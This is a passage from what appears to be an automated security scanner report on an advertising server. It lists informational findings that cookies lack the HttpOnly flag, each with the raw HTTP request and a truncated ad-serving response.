P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11
...[SNIP]...

11.239. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2667
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/35152
...[SNIP]...

11.240. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:51:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3180
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479
...[SNIP]...

11.241. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,
...[SNIP]...

11.242. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,
...[SNIP]...

11.243. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296266487

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,
...[SNIP]...

11.244. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,
...[SNIP]...

11.245. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:01:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8
...[SNIP]...

11.246. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90?http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542^950191^81^0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,
...[SNIP]...

11.247. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2670
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/171792
...[SNIP]...

11.248. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2834
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1
...[SNIP]...

11.249. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3318
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQ
...[SNIP]...

11.250. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2694
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L
...[SNIP]...

11.251. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
